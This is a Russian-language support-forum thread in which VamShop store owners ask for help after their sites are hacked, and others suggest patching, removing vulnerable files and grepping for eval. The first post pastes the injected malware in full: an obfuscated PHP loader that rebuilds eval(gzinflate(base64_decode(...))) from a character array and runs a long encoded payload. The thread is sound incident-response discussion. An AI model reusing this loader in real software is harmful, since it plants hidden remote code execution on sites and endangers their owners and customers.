Lexand 0 Опубликовано 5 сентября, 2012 Жалоба Share Опубликовано 5 сентября, 2012 Люди помогите разобраться со злодеем который размещает вот эту батву (<?php $md5 = "49e474de9acfbbc1f888008a67968de4"; $ae = array(")","_",'b','g',"r","s",'d','t',"n",";",'f',"6","z",'c','(',"$",'e','i',"l","a","o","v","4"); $be3 = create_function('$'.'v',$ae[16].$ae[21].$ae[19].$ae[18].$ae[14].$ae[3].$ae[12].$ae[17].$ae[8].$ae[10].$ae[18].$ae[19].$ae[7].$ae[16].$ae[14].$ae[2].$ae[19].$ae[5].$ae[16].$ae[11].$ae[22].$ae[1].$ae[6].$ae[16].$ae[13].$ae[20].$ae[6].$ae[16].$ae[14].$ae[15].$ae[21].$ae[0].$ae[0].$ae[0].$ae[9]); $be3('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'); ?> во всех файлах php. Только недавно все удалил, поменял все пароли и сегодня опять такая ботва. HELP!!! Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 5 сентября, 2012 Жалоба Share Опубликовано 5 сентября, 2012 Версия какая? какой хостер? Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 5 сентября, 2012 Жалоба Share Опубликовано 5 сентября, 2012 ссылку на сайт дайте Ссылка на сообщение Поделиться на другие сайты
Lexand 0 Опубликовано 5 сентября, 2012 Автор Жалоба Share Опубликовано 5 сентября, 2012 Версия 1.62 ссылка http://iClock.ru Хостер - NIC.RU Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 5 сентября, 2012 Жалоба Share Опубликовано 5 сентября, 2012 http://vamshop.ru/forum/topic/10261-%D0%BF%D0%BE-%D0%BF%D0%BE%D0%B2%D0%BE%D0%B4%D1%83-%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BE%D0%B2-%D0%B2-%D0%BC%D0%B0%D0%B3%D0%B0%D0%B7%D0%B8%D0%BD%D0%B0%D1%85/ сделайте то что тут советуется. похоже на обычный взлом через tiny_mce Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 5 сентября, 2012 Жалоба Share Опубликовано 5 сентября, 2012 еще. доступы к файлам ФТП где хранятся и чем пользуетесь для редактирования файлов? Ссылка на сообщение Поделиться на другие сайты
Lexand 0 Опубликовано 5 сентября, 2012 Автор Жалоба Share Опубликовано 5 сентября, 2012 еще. доступы к файлам ФТП где хранятся и чем пользуетесь для редактирования файлов? Total Commander 7.04a пароли хранятся в exel файлике отделно. Ссылка на сообщение Поделиться на другие сайты
Lexand 0 Опубликовано 5 сентября, 2012 Автор Жалоба Share Опубликовано 5 сентября, 2012 http://vamshop.ru/fo...BD%D0%B0%D1%85/ сделайте то что тут советуется. похоже на обычный взлом через tiny_mce http://vamshop.ru/fo...BD%D0%B0%D1%85/ сделайте то что тут советуется. похоже на обычный взлом через tiny_mce tinybrowser - нету И что интересно, этот код вставлен совершенно во все файлы в самом начале. 04.09.2012 в 23:09 log.txt Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 5 сентября, 2012 Жалоба Share Опубликовано 5 сентября, 2012 У Вас довольно старая версия, с тех пор в том числе и дыры в скриптах закрывались. Если уж обновляться не хотите, то хотя бы удалите файл affiliate_show_banner.php Ссылка на сообщение Поделиться на другие сайты
Elina 0 Опубликовано 26 августа, 2013 Жалоба Share Опубликовано 26 августа, 2013 Я надеюсь, мы все почистили, но на всякий случай спрошу. Делался перенос с очень давней версии 1.47 до 1.70. На грабли с tinybrowser мы когда-то уже наступали, его у нас не было. Кто-ж знал что в патчах эта гадость опять объявится. В итоге сайт хакнули. Что меня напрягает в этой ситуации. Хостер дал нам список файлов, которые надо вычистить, там не было ни одного из каталога tinybrowser! А было вот что: Практически весь каталог ajaxfilemanager. Это снова работа с картиками, через него взлома быть точно не может? Я его обновила из архива, но осадок остался. Особенно потому что на сайте лежали и патчи, так вот, все файлы из ajaxfilemanager тоже были там завирусованы. Далее, по мелочам: includes/modules/payment/authorizenet.php includes/modules/payment/psigate.php includes/modules/shipping/ruspost.php lang/russian/modules/payment/psigate.php lang/russian/modules/shipping/ruspost.php lang/english/modules/payment/psigate.php lang/english/modules/shipping/ruspost.php admin/includes/javascript/tiny_mce/tiny_mce_src.js Одни и те же файлы и на тестовой версии, и на основной. И главное что напрягает - не вижу никакой разницы у этих файлов с архивными. Буду благодарна за комментарии. access logs не сохранились, они их затирают каждый день. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 26 августа, 2013 Жалоба Share Опубликовано 26 августа, 2013 Так кроме tinybrowser в старых версиях были и другие дырки, заразить можно любой файл в любой папке. Напрмиер ещё была популярной дырка в affiliate_show_banner.php файле, может её использовали. Ссылка на сообщение Поделиться на другие сайты
Elina 0 Опубликовано 26 августа, 2013 Жалоба Share Опубликовано 26 августа, 2013 Это тоже было, уже почистила, но и его не было в списке. Есть еще что-то что мне надо удалить? Сейчас стоит 70 патч, но может еще что-то надо вычистить. Ссылка на сообщение Поделиться на другие сайты
shaklov 63 Опубликовано 26 августа, 2013 Жалоба Share Опубликовано 26 августа, 2013 1. Распаковываете у себя на компьютере чистую версию 1.70 в папку №1 2. Скачиваете свой магазин на компьютер в папку №2 3. Сравниваете эти две папки любой программой сравнения файлов 4. Лишнее в папке №2 внематочно просматриваете на предмет деструктивного кода Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 26 августа, 2013 Жалоба Share Опубликовано 26 августа, 2013 Elina Ну если Вам уже успели загрузить в магазине так называемый shell скрипт, то уже без разницы какая версия, зайдся в этот shell можно делать всё что угодно. Так что нужно попробовать поискать этот shell Я например так ищу - http://mr-stiher.ru/blog/find-shell-via-shh.html Ссылка на сообщение Поделиться на другие сайты
Elina 0 Опубликовано 26 августа, 2013 Жалоба Share Опубликовано 26 августа, 2013 Первый способ хорош, если есть дистрибут 70, а у меня его нет, мы апдейтились с 47 версии. Есть директория куда слиты все обновления, есть копия базовой 47 версии. Второй способ хороши, если свой код знать на память. Но я то его не знаю. Вот система мне выдает список. И чем мне это помогает? Найти список обновлений за последние несколько дней тоже не сработает - взломали сразу как я перезаливку сделала, это список файлов всего сайта. find public_html -type f -iname "*.php" -exec grep -Him1 'eval' {} \; public_html/inc/vam_gdlib_check.inc.php: eval("phpinfo();"); public_html/inc/vam_address_format.inc.php: eval("\$address = \"$fmt\";"); public_html/inc/vam_address_summary.inc.php:// eval("\$address = \"{$address_format['address_summary']}\";"); public_html/excel/Writer.php: header("Cache-Control: must-revalidate, post-check=0,pre-check=0"); public_html/excel/PEAR/Installer.php: eval("\$to = $a[to];"); public_html/excel/PEAR/ErrorStack.php: * Allows easy retrieval and deletion of only errors from a particular level public_html/excel/PEAR/PackageFile/Generator/v2.php: function _serializeValue($value, $tagName = null, $attributes = array()) public_html/excel/PEAR/PackageFile/Generator/v1.php: function toXml($state = PEAR_VALIDATE_NORMAL, $nofilevalidation = false) public_html/excel/PEAR/PEAR.php: eval('$e = new Exception($this->message, $this->code);throw($e);'); public_html/excel/PEAR/Command/Package.php: 'function' => 'doPackageValidate', public_html/excel/PEAR/Command/Channels.php: // if force is specified, use a timestamp of "1" to force retrieval public_html/excel/Excel/Parser.php: 'DATEVALUE' => array( 140, 1, 1, 0 ), public_html/excel/Excel/Workbook.php: // but would evaluate to zero. public_html/excel/PEAR.php: eval('$e = new Exception($this->message, $this->code);throw($e);'); public_html/includes/external/avisosms/avisosmsmc.class.php: eval($out . ';'); public_html/includes/external/smarty/Smarty.class.php: * wrapper for eval() retaining $this public_html/includes/external/smarty/plugins/function.eval.php: * Smarty {eval} function plugin public_html/includes/external/smarty/plugins/function.mailto.php: return '<script type="text/javascript">eval(unescape(\''.$js_encode.'\'))</script>'; public_html/includes/external/smarty/plugins/function.math.php: eval("\$smarty_math_result = ".$equation.";"); public_html/includes/external/smarty/plugins/modifier.regex_replace.php: /* remove eval-modifier from $search */ public_html/includes/external/smarty/internals/core.process_cached_inserts.php: $smarty->_eval($php_resource); public_html/includes/external/smarty/internals/core.run_insert_handler.php: $smarty->_eval($_params['php_resource']); public_html/includes/external/smarty/internals/core.smarty_include_php.php: $smarty->_eval($_smarty_php_resource, $params['smarty_include_vars']); public_html/includes/external/phpmailer/backup/class.phpmailer.php: * Evaluates the message and returns modifications for inline images and backgrounds public_html/includes/external/phpmailer/class.phpmailer.php: //TODO using /e (equivalent to eval()) is probably not a good idea public_html/includes/modules/payment/roboxchange.php: vam_draw_hidden_field('SignatureValue', $crc); public_html/includes/modules/shipping/russianpostems.php:$header [] = "Cache-Control: no-store, no-cache, must-revalidate"; public_html/includes/classes/nusoap/nusoap.php: // evaluate message, getting back parameters public_html/includes/classes/banktransfer_validation.php: $AccountFloat = doubleval($AccountNo); public_html/includes/functions/compatibility.php: eval("\$temp=$constant;"); public_html/cache/%%7A^7A7^7A706FFB%%lang_english.conf%7Creviews.php: 'text_rating' => 'Evaluation:', public_html/lang/english/english.php:define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Evaluation'); public_html/admin/backup.php://header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/admin/modules.php: eval('$keys .= ' . $value['set_function'] . "'" . $value['value'] . "', '" . $key . "');"); public_html/admin/configuration.php: eval('$value_field = ' . $configuration['set_function'] . '"' . htmlspecialchars($configuration['configuration_value']) . '");'); public_html/admin/exportorders.php:header("Cache-Control: cache, must-revalidate"); public_html/admin/includes/modules/new_product.php: eval ($code); public_html/admin/includes/classes/xml_domit_utilities.php: DOMIT_Utilities::convertEntities($node->nodeValue, $definedEntities) : public_html/admin/includes/classes/import.php: eval ($code); public_html/admin/includes/classes/xml_domit_xpath.php: * Converts the predicate into PHP evaluable code public_html/admin/includes/classes/ci_tag_config.class.php: $this->data['value'] = eval("return ".$this->data['value']); public_html/admin/includes/classes/image_manipulator_GD1.php: eval("\$this->maniparray = array(".$this->c.");"); public_html/admin/includes/classes/xml_domit_doctor.php: $xmlText = domit_doctor::evaluateCharacter($xmlText, public_html/admin/includes/classes/pclzip.lib.php: eval('$v_result = '.$p_options[PCLZIP_CB_PRE_ADD].'(PCLZIP_CB_PRE_ADD, $v_local_header);'); public_html/admin/includes/classes/phplot.php: header('Cache-Control: no-cache, must-revalidate'); public_html/admin/includes/classes/xml_domit_parser.php: var $nodeValue = null; public_html/admin/includes/classes/ci_tag_changelangdef.class.php: $this->data['changevalue'] = array(); public_html/admin/includes/classes/xml_domit_lite_parser.php: var $nodeValue = null; public_html/admin/includes/classes/image_manipulator_GD2.php: eval("\$this->maniparray = array(".$this->c.");"); public_html/admin/includes/functions/general.php: eval ("\$address = \"$fmt\";"); public_html/admin/includes/functions/get_exel_data.php: if (!empty($c)) $asd = @eval($c); public_html/admin/includes/javascript/tiny_mce/plugins/spellchecker/rpc.php:header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/inc/function.base.php: header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/admin/easypopulate.php: eval($ep_additional_layout_product_description); public_html/admin/articles_config.php: eval('$value_field = ' . $configuration['set_function'] . '"' . htmlspecialchars($configuration['configuration_value']) . '");'); public_html/admin/attributeManager/classes/attributeManagerConfig.class.php: $updateValues = array(); public_html/admin/parameters_export.php: header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); public_html/admin/module_export.php: eval('$keys .= ' . $value['set_function'] . "'" . $value['value'] . "', '" . $key . "');"); public_html/admin/csv_backend.php: eval('$value_field = ' . $configuration['set_function'] . '"' . htmlspecialchars($configuration['configuration_value']) . '");'); public_html/admin/order_editor/javascript.php: var finalPriceValue = document.getElementById("update_products[" + pid + "][price]").value; public_html/admin/sxd/backup.php:header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/admin/sxd/index.php:header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/admin/print_order.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/admin/print_packingslip.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/robox.php:$crc = get_var('SignatureValue'); public_html/packingslip.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/download.php:header("Cache-Control: no-cache, must-revalidate"); public_html/schet.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/test/inc/vam_gdlib_check.inc.php: eval("phpinfo();"); public_html/test/inc/vam_address_format.inc.php: eval("\$address = \"$fmt\";"); public_html/test/inc/vam_address_summary.inc.php:// eval("\$address = \"{$address_format['address_summary']}\";"); public_html/test/excel/Writer.php: header("Cache-Control: must-revalidate, post-check=0,pre-check=0"); public_html/test/excel/PEAR/Installer.php: eval("\$to = $a[to];"); public_html/test/excel/PEAR/ErrorStack.php: * Allows easy retrieval and deletion of only errors from a particular level public_html/test/excel/PEAR/PackageFile/Generator/v2.php: function _serializeValue($value, $tagName = null, $attributes = array()) public_html/test/excel/PEAR/PackageFile/Generator/v1.php: function toXml($state = PEAR_VALIDATE_NORMAL, $nofilevalidation = false) public_html/test/excel/PEAR/PEAR.php: eval('$e = new Exception($this->message, $this->code);throw($e);'); public_html/test/excel/PEAR/Command/Package.php: 'function' => 'doPackageValidate', public_html/test/excel/PEAR/Command/Channels.php: // if force is specified, use a timestamp of "1" to force retrieval public_html/test/excel/Excel/Parser.php: 'DATEVALUE' => array( 140, 1, 1, 0 ), public_html/test/excel/Excel/Workbook.php: // but would evaluate to zero. public_html/test/excel/PEAR.php: eval('$e = new Exception($this->message, $this->code);throw($e);'); public_html/test/includes/external/avisosms/avisosmsmc.class.php: eval($out . ';'); public_html/test/includes/external/smarty/Smarty.class.php: * wrapper for eval() retaining $this public_html/test/includes/external/smarty/plugins/function.eval.php: * Smarty {eval} function plugin public_html/test/includes/external/smarty/plugins/function.mailto.php: return '<script type="text/javascript">eval(unescape(\''.$js_encode.'\'))</script>'; public_html/test/includes/external/smarty/plugins/function.math.php: eval("\$smarty_math_result = ".$equation.";"); public_html/test/includes/external/smarty/plugins/modifier.regex_replace.php: /* remove eval-modifier from $search */ public_html/test/includes/external/smarty/internals/core.process_cached_inserts.php: $smarty->_eval($php_resource); public_html/test/includes/external/smarty/internals/core.run_insert_handler.php: $smarty->_eval($_params['php_resource']); public_html/test/includes/external/smarty/internals/core.smarty_include_php.php: $smarty->_eval($_smarty_php_resource, $params['smarty_include_vars']); public_html/test/includes/external/phpmailer/class.phpmailer.php: //TODO using /e (equivalent to eval()) is probably not a good idea public_html/test/includes/modules/payment/roboxchange.php: vam_draw_hidden_field('SignatureValue', $crc); public_html/test/includes/modules/shipping/russianpostems.php:$header [] = "Cache-Control: no-store, no-cache, must-revalidate"; public_html/test/includes/classes/nusoap/nusoap.php: // evaluate message, getting back parameters public_html/test/includes/classes/banktransfer_validation.php: $AccountFloat = doubleval($AccountNo); public_html/test/includes/functions/compatibility.php: eval("\$temp=$constant;"); public_html/test/cache/%%B3^B32^B32E92FE%%lang_english.conf%7Creviews.php: 'text_rating' => 'Evaluation:', public_html/test/lang/english/english.php:define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Evaluation'); public_html/test/admin/backup.php://header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/test/admin/modules.php: eval('$keys .= ' . $value['set_function'] . "'" . $value['value'] . "', '" . $key . "');"); public_html/test/admin/configuration.php: eval('$value_field = ' . $configuration['set_function'] . '"' . htmlspecialchars($configuration['configuration_value']) . '");'); public_html/test/admin/exportorders.php:header("Cache-Control: cache, must-revalidate"); public_html/test/admin/includes/modules/new_product.php: eval ($code); public_html/test/admin/includes/classes/xml_domit_utilities.php: DOMIT_Utilities::convertEntities($node->nodeValue, $definedEntities) : public_html/test/admin/includes/classes/import.php: eval ($code); public_html/test/admin/includes/classes/xml_domit_xpath.php: * Converts the predicate into PHP evaluable code public_html/test/admin/includes/classes/ci_tag_config.class.php: $this->data['value'] = eval("return ".$this->data['value']); public_html/test/admin/includes/classes/image_manipulator_GD1.php: eval("\$this->maniparray = array(".$this->c.");"); public_html/test/admin/includes/classes/xml_domit_doctor.php: $xmlText = domit_doctor::evaluateCharacter($xmlText, public_html/test/admin/includes/classes/pclzip.lib.php: eval('$v_result = '.$p_options[PCLZIP_CB_PRE_ADD].'(PCLZIP_CB_PRE_ADD, $v_local_header);'); public_html/test/admin/includes/classes/phplot.php: header('Cache-Control: no-cache, must-revalidate'); public_html/test/admin/includes/classes/xml_domit_parser.php: var $nodeValue = null; public_html/test/admin/includes/classes/ci_tag_changelangdef.class.php: $this->data['changevalue'] = array(); public_html/test/admin/includes/classes/xml_domit_lite_parser.php: var $nodeValue = null; public_html/test/admin/includes/classes/image_manipulator_GD2.php: eval("\$this->maniparray = array(".$this->c.");"); public_html/test/admin/includes/functions/general.php: eval ("\$address = \"$fmt\";"); public_html/test/admin/includes/functions/get_exel_data.php: if (!empty($c)) $asd = @eval($c); public_html/test/admin/includes/javascript/tiny_mce/plugins/spellchecker/rpc.php:header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/test/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/inc/function.base.php: header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/test/admin/easypopulate.php: eval($ep_additional_layout_product_description); public_html/test/admin/articles_config.php: eval('$value_field = ' . $configuration['set_function'] . '"' . htmlspecialchars($configuration['configuration_value']) . '");'); public_html/test/admin/attributeManager/classes/attributeManagerConfig.class.php: $updateValues = array(); public_html/test/admin/parameters_export.php: header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); public_html/test/admin/module_export.php: eval('$keys .= ' . $value['set_function'] . "'" . $value['value'] . "', '" . $key . "');"); public_html/test/admin/csv_backend.php: eval('$value_field = ' . $configuration['set_function'] . '"' . htmlspecialchars($configuration['configuration_value']) . '");'); public_html/test/admin/order_editor/javascript.php: var finalPriceValue = document.getElementById("update_products[" + pid + "][price]").value; public_html/test/admin/sxd/backup.php:header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/test/admin/sxd/index.php:header("Cache-Control: no-store, no-cache, must-revalidate"); public_html/test/admin/print_order.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/test/admin/print_packingslip.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/test/robox.php:$crc = get_var('SignatureValue'); public_html/test/packingslip.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); public_html/test/download.php:header("Cache-Control: no-cache, must-revalidate"); public_html/test/schet.php: $summ_rub= doubleval(sprintf("%0.0f",$summ)); Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 27 августа, 2013 Жалоба Share Опубликовано 27 августа, 2013 Если немного понимать php, то поможет конечно. На первый взгляд, ничего подозрительного по eval нет. Хотя обычно shell'ы активно используют функцию eval Ссылка на сообщение Поделиться на другие сайты
Elina 0 Опубликовано 27 августа, 2013 Жалоба Share Опубликовано 27 августа, 2013 Thanks! Не работала я никогда с php, я на него смотрю как на нечто похожее на Си, только и всего. Ссылка на сообщение Поделиться на другие сайты
MaZa 10 Опубликовано 3 сентября, 2013 Жалоба Share Опубликовано 3 сентября, 2013 я бы на вашем месте проверил компьютер на вирусы. сначала программой trojan remover, затем глубоким сканированием с обновленными антивирусными базами, а в идеале, подключив жесткий диск как внешнее устройство (чтобы можно было просканировать файлы, которые не доступны в исполняемой среде). ну, и искать знакомых-специалистов в области IT или нанять специалиста, который поможет в вопросе. Второй способ хороши, если свой код знать на память. Но я то его не знаю. Вот система мне выдает список. И чем мне это помогает?Найти список обновлений за последние несколько дней тоже не сработает - взломали сразу как я перезаливку сделала, это список файлов всего сайта. вы ведь не компетентны, поэтому список файлов, который вы получили вам ни о чем не говорит. чтобы что-то сказало, вы должны понимать как работает функция eval и почему её ищут, что такое shell-скрипт, также очень кстати были бы фундаментальные знания о юникс-системе. эх, проблема в том, что много людей заблуждаются, думая, что веб-приложение можно просто установить и пользоваться. возьмите, к примеру, случай с автомобилем. его ведь тоже недостаточно просто купить и ездить. чтобы пользоваться автомобилем необходимо периодически обслуживать его на СТО, обновлять некоторые детали, и даже банально следить за чистотой. Почему-то люди привыкли отдавать свой автомобиль на СТО, на мойку, покраску и т.п. с сайтами пока ещё существует иллюзия, что можно всё самому сделать без особых знаний и усилий :) p.s.: свой код на память никто не знает. что касается вамшоп, то кто только над ним не работал. движку более 10 лет и он основан на немецкой xt:commerce, который в свою очередь является форком oscommerce, в данный момент вамшоп состоит примерно из 2800 файлов. (поправьте меня, если где-то ошибся). Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения